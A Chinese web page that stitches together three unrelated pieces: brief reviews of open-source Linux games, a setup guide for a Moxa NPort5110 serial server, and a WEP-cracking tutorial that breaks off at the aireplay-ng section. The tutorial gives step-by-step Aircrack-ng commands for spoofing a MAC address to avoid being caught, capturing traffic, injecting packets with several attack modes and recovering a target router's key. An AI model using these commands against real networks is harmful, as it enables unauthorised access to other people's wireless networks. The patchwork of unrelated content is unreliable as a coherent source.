《韦诺之战》是一款开放源代码、跨平台的回合制策略游戏。
韦诺之战其实就是一款战旗游戏,但是其有随机性,每个单位在不同的地方有不同的概率闪避对方的攻击,每个单位还会具有不同的特质,这些都会给游戏带来不少趣味。
此外,游戏里的音乐也非常精良,虽然是一款开源的游戏,但是质量足以与商业游戏媲美。
Nexuiz【更名为 xonotic】
Nexuiz是一个三维第一人称射击游戏,游戏引擎为DarkPlaces,修改自雷神之锤引擎,它的游戏源代码在GNU通用公共许可证许可下发布。
Tux Racer
这是一个非常轻松有趣的游戏。
游戏中,玩家控制Tux从满是冰雪的山坡上滑下,并不断收集分布在路旁的鱼。在冰上滑行可以让Tux走得更快,在雪上滑行则更易 *** 作,而在岩石路上滑行会让Tux减速。路上有树会阻挡Tux的去路,还会有旗子标明滑行方向。
Warzone2100
它是一个未来背景的即时战略游戏。科技树中包含400多种组件,首创单位组合概念,各种车辆都可以从部件整合设计。支持单机任务和联机游戏。因为2004年的公开源代码,使得开发持续进行,出现了新的活力,也使得其拥有跨平台能力。
TORCS
The Open Racing Car Simulator(TORCS)是一款开源3D赛车模拟游戏。是在Linux *** 作系统上广受欢迎的赛车游戏。有50种车辆和20条赛道,不错的视觉效果。【就是控制不好方向】
FooBillard
FooBillard 是免费的OpenGL台球游戏。首先支持Linux,有人移植到Mac OS X和Windows。拥有真实的物理引擎和AI,大部分台球的玩法都提供
好了也就介绍这么多了
我们用一条交叉网线把NPort5110 和PC机的网口连接起来,并把NPort上电。首先,打开控制面板,网络连接。
在本地连接上点右键,选择属性。
双击进入 Internet协议(TCP/IP),点击“使用下面的IP地址”
写入 IP 地址和子网掩码,记住要和NPORT 的IP 地址在同一子网段内。如NPORT 默认IP
为192.168.127.254,255.255.255.0;就需要把PC 机的IP 地址设为192.168.127.XXX,
255.255.255.0,最后一个数字不同即可。
点击确定。
第二章:网络和串口参数配置
搜索 NPort
打开NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此
时请确认网络防火墙已经关闭。
会搜索到我们的NPort5110,点击stop,停止搜索。
网络参数配置
双击右边空白处的NPort 设备,会出现以下界面,点击选择Network 选项卡,点击Modify
修改。可以看到以下界面:
我们可以在里面修改NPort的以下参数:
IPAddress:IP地址。
Netmask:子网掩码。
Gateway:网关。
IP Configuration:可以配置为静态IP(Static),或者为DHCP(动态IP)。
DNS Server1和2:DNS,域名解析服务器。
串口参数配置
点击 Serial选项卡,点击Modify修改,双击端口进去,可以看到以下界面:
我们可以在里面修改以下参数:
Baud Rate:波特率,NPort5000 系列只能支持标准波特率,如9600,115200bps 等。
Parity:校验。
None:无校验
Even:偶校验。
Odd:奇校验。
Space:空。
Mark:标志。
Data Bits:数据位。
Stop Bits:停止位。
Flow Control:流量控制。
None:无流量控制。
XON/XOFF:软件流控。
RTS/CTS:硬件流控。
FIFO:64bit先进先出,为了降低CPU负载,提高设备性能。可以选择Enable启用,或Disable
禁用。
Interface:可选择RS232,RS422,RS485 2线,或者RS485 4线。(NP5110 只能为RS232)
设置好后,点击OK,设置保存,设备重新启动。
第三章: *** 作模式设置
Real COM映射端口
打开 NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此
时请确认网络防火墙已经关闭。
会搜索到我们的NPort5110,点击stop,停止搜索。
双击右边的5110,选择Operating Mode选项卡,确认为Real COM模式:
点击左边的第四项:COM MAPPING,
再点击Add
点击“OK”,
点击“Apply”保存
点击“Yes”,点击“OK”。
这样,端口就映射好了。
TCP Server模式的设置(用软件)
打开 NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此
时请确认网络防火墙已经关闭。
会搜索到我们的NPort5110,点击stop,停止搜索。如果打开防火墙,可以使用Search IP,
在下面选项框里输入NPort的IP地址,
点击 OK,就可以搜索到NPort设备。
双击右边的NP5110,切换到OperatingMode选项卡,点击Modify,双击进去。可以把模式
修改成TCP Server 模式。
里面的名词解释:
Local TCP Port:本地数据端口,指的是NP5110 的数据端口。
Command Port:NP5110 的命令端口。
Max Connection:最大连接数,也就是说同时最大可以有几台上位机采集到下面串口设备
的数据,NPort5000 系列最大是4 个,NPort6000 和CN2600 系列是8 个。
当最大连接数为2 或以上的时候,右边的选项Allow Driver Control 和Ignore Jammed IP会开
启。
Allow Driver Control:当最大连接数为2 或以上时,且此功能打开时,上位机A 需要以
4800bps打开串口,上位机B需要以9600bps打开串口,是可以的。如果此功能关闭,则波
特率需以固件中的设置一致。
Ignore Jammed IP:当最大连接数为2 或以上时,且此功能打开时,其中一台上位机A死
机,上位机B 依然可以正常接收数据。如果此功能关闭,则上位机B 也不能收到串口的数
据了。
Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息
另外还有其他的 linux 基本命令,我就不提示了。
具体破解步骤:
1. 修改无线网卡状态:先 dow
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等
ifconfig -a
ifconfig -a ath0 up
airmon-ng start wifi0 6
airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1
airodump-ng ath1
aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1
----------- -3 Crack Mode-----------
aireplay-ng -3 -b 目标MAC -h 本机MAC ath1
----------- -4 Crack Mode-----------
aireplay-ng -4 -b 目标MAC -h 本机MAC ath1
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- -5 Crack Mode-----------
aireplay-ng -5 -b 目标MAC -h 本机MAC ath1
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
-----------Crack Key-----------
aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs
——————————————————————————————
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
1. ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC 。
2.macchanger
用来改变网卡的 MAC 地址,具体用法如下:
usage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。
3.airmon-ng
启动无线网卡进入 Monitor 模式,
useage: airmon-ng <start|stop|check><interface>[channel]
<start|stop|check>启动,停止,检测
<interface>指定无线网卡
[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了
4.iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid号 开启关闭
[nwid{NN|on|off}] 指定网络id号 开启关闭
[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]] 指定工作频率
[channel N] 指定频道
[ap {N|off|auto}] 指定AP号 关闭/自动
[sens N] sens 号
[nick N] nick 号
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范围
[power {period N|timeout N}] 电源 频率/超时
[retry {limit N|lifetime N}] 重试 限次/超时
[txpower N{mw|dBm}] 功率 毫瓦/分贝
[commit] 处理
5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 扫描
frequency 频率
channel 频道
bitrate 速率
rate 速率
encryption 加密
key 密钥
power 电源
txpower 功率
ap ap
accespoints ap
peers 直连
event 事件
6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage: airodump-ng <options><interface>[,<interface>,...]
Options:
--ivs :仅将抓取信息保存为 .ivs
--gpsd :使用 GPSd
--write <prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w :同 --write
--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的
--update <secs>:显示更新延迟,没有用过
--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h :隐藏已知的,配合上面的选项使用
-f <msecs>:跳频时间
--berlin <secs>:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)
-r <file>:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵
Filter options:
--encrypt <suite>: 使用密码序列过滤 AP
--netmask <netmask>: 使用掩码过滤 AP
--bssid <bssid>: 使用 bssid 过滤 AP
-a : 过滤无关的客户端
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令 *** 作:
--channel <channels>:指定频道
--band <abg>:制定带宽
-C <frequencies>:指定频率MHz
--cswitch <method>: 设置频道交换方式
0 : FIFO (default) 先进先出(默认)
1 : Round Robin 循环
2 : Hop on last 最后一跳
-s : 同上
--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文
7.aireplay-ng
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)